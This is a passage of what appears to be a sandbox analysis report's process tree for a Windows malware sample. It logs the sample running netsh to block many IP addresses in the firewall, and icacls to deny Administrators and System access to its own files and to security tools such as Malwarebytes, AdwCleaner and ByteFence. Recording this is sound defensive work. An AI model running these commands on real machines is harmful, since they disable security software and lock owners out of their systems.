          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.255
          PID:4796
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.255
            PID:4184
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.255
          PID:4236
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.255
            PID:3856
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.255
          PID:4788
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.255
            PID:4848
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.255
          PID:4912
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.255
            PID:4676
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.248
          PID:5116
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.248
            PID:4808
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.255
          PID:4320
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.255
            PID:2932
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.255
          PID:5100
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.255
            PID:4272
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.255
          PID:5048
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.255
            PID:1624
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.255
          PID:5112
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.255
            PID:4084
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.113
          PID:5092
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.113
            PID:5052
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.113
          PID:4656
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.113
            PID:4192
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.72
          PID:4784
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.72
            PID:4232
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.72
          PID:4932
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.72
            PID:4760
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.96
          PID:4708
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.96
            PID:5232
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.96
          PID:4924
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.96
            PID:5136
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.81
          PID:5168
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.81
            PID:5296
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.81
          PID:5180
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.81
            PID:5308
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.22
          PID:5332
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.22
            PID:5464
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.22
          PID:5356
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.22
            PID:5456
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.186
          PID:5496
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.186
            PID:5624
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.186
          PID:5508
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.186
            PID:5612
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.169
          PID:5652
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.169
            PID:5800
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.169
          PID:5676
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.169
            PID:5808
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.11
          PID:5848
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.11
            PID:5956
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.11
          PID:5860
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.11
            PID:5964
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.236
          PID:6004
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.236
            PID:6120
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.236
          PID:6016
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.236
            PID:6128
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.61
          PID:4844
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.61
            PID:4868
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.61
          PID:4884
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.61
            PID:4136
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.102
          PID:4984
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.102
            PID:1012
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.102
          PID:4248
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.102
            PID:4124
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.151
          PID:4752
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.151
            PID:5856
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.151
          PID:4496
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.151
            PID:5608
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=104.248.92.26
          PID:5868
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=104.248.92.26
            PID:3872
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=104.248.92.26
          PID:4536
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=104.248.92.26
            PID:4504
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=167.71.52.230
          PID:4456
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=167.71.52.230
            PID:5228
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=167.71.52.230
          PID:5420
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=167.71.52.230
            PID:5340
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)
          PID:5336
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)
            PID:5512
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F)
          PID:5428
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F)
            PID:5664
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F)
          PID:4864
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F)
            PID:5840
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)
          PID:2844
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5824
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)
          PID:5532
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)
            PID:5988
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F)
          PID:5704
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F)
            PID:5916
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F)
          PID:5288
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F)
            PID:5864
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)
          PID:5908
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)
            PID:6096
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)
          PID:4256
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)
            Modifies file permissions
            PID:6136
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)
          PID:4252
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:4620
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
          PID:4268
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
            PID:5044
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny Администраторы:(F)
          PID:4904
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\java.exe /deny Администраторы:(F)
            Modifies file permissions
            PID:5500
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny System:(F)
          PID:3844
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\java.exe /deny System:(F)
            PID:6080
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny система:(F)
          PID:5172
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\java.exe /deny система:(F)
            PID:3712
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Администраторы:(OI)(CI)(F)
          PID:6112
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5680
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
          PID:4424
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
            PID:5912
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny Администраторы:(OI)(CI)(F)
          PID:4484
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5812
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny System:(OI)(CI)(F)
          PID:4172
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny System:(OI)(CI)(F)
            Modifies file permissions
            PID:5768
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny Администраторы:(F)
          PID:2620
          • C:\Windows\SysWOW64\icacls.exe
            icacls c:\windows\svchost.exe /deny Администраторы:(F)
            PID:5656
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny System:(F)
          PID:4532
          • C:\Windows\SysWOW64\icacls.exe
            icacls c:\windows\svchost.exe /deny System:(F)
            Modifies file permissions
            PID:5996
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny система:(F)
          PID:2732
          • C:\Windows\SysWOW64\icacls.exe
            icacls c:\windows\svchost.exe /deny система:(F)
            Modifies file permissions
            PID:5328
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)
          PID:5760
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5968
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
          PID:5708
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
            PID:5344
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)
          PID:5920
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:6020
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
          PID:4740
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
            Modifies file permissions
            PID:5216
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny Администраторы:(OI)(CI)(F)
          PID:5952
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\program files\Internet Explorer\bin" /deny Администраторы:(OI)(CI)(F)
            PID:3924
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
          PID:348
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
            Modifies file permissions
            PID:4508
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny Администраторы:(OI)(CI)(F)
          PID:6108
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Zaxar" /deny Администраторы:(OI)(CI)(F)
            PID:5556
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
          PID:5716
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
            Modifies file permissions
            PID:5816
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)
          PID:5208
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:2132
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
          PID:388
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
            PID:1596
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass.exe /deny Администраторы:(F)
          PID:5176
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\lsass.exe /deny Администраторы:(F)
            PID:5156
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass.exe /deny System:(F)
          PID:4544
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\lsass.exe /deny System:(F)
            Modifies file permissions
            PID:2832
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\kz.exe /deny Администраторы:(F)
          PID:4644
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\kz.exe /deny Администраторы:(F)
            Modifies file permissions
            PID:5904
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\kz.exe /deny System:(F)
          PID:5580
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\kz.exe /deny System:(F)
            Modifies file permissions
            PID:6060
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\script.exe /deny Администраторы:(F)
          PID:5692
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\script.exe /deny Администраторы:(F)
            Modifies file permissions
            PID:5584
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\script.exe /deny System:(F)
          PID:4812
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\script.exe /deny System:(F)
            Modifies file permissions
            PID:5668
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny Администраторы:(F)
          PID:4768
          • C:\Windows\SysWOW64\icacls.exe
            icacls c:\programdata\Malwarebytes /deny Администраторы:(F)
            Modifies file permissions
            PID:5396
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
          PID:4460
          • C:\Windows\SysWOW64\icacls.exe
            icacls c:\programdata\Malwarebytes /deny System:(F)
            PID:5220
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny Администраторы:(F)
          PID:5568
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\MB3Install /deny Администраторы:(F)
            Modifies file permissions
            PID:5140
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
          PID:4888
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\MB3Install /deny System:(F)
            PID:5560
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\olly.exe /deny Администраторы:(F)
          PID:5364
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\olly.exe /deny Администраторы:(F)
            PID:4876
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\olly.exe /deny System:(F)
          PID:4792
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\olly.exe /deny System:(F)
            PID:6124
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass2.exe /deny Администраторы:(F)
          PID:5244
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\lsass2.exe /deny Администраторы:(F)
            PID:5960
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass2.exe /deny System:(F)
          PID:4628
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\lsass2.exe /deny System:(F)
            Modifies file permissions
            PID:3824
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\boy.exe /deny Администраторы:(F)
          PID:5312
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\boy.exe /deny Администраторы:(F)
            PID:5184
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\boy.exe /deny System:(F)
          PID:5008
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\boy.exe /deny System:(F)
            Modifies file permissions
            PID:1312
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)
          PID:2100
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)
            PID:4300
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
          PID:4724
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
            PID:504
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Администраторы:(OI)(CI)(F)
          PID:4640
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5544
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
          PID:4560
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
            PID:5764
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)
          PID:5012
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:2860
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)
          PID:5888
          • C:\Windows\SysWOW64\icacls.exe
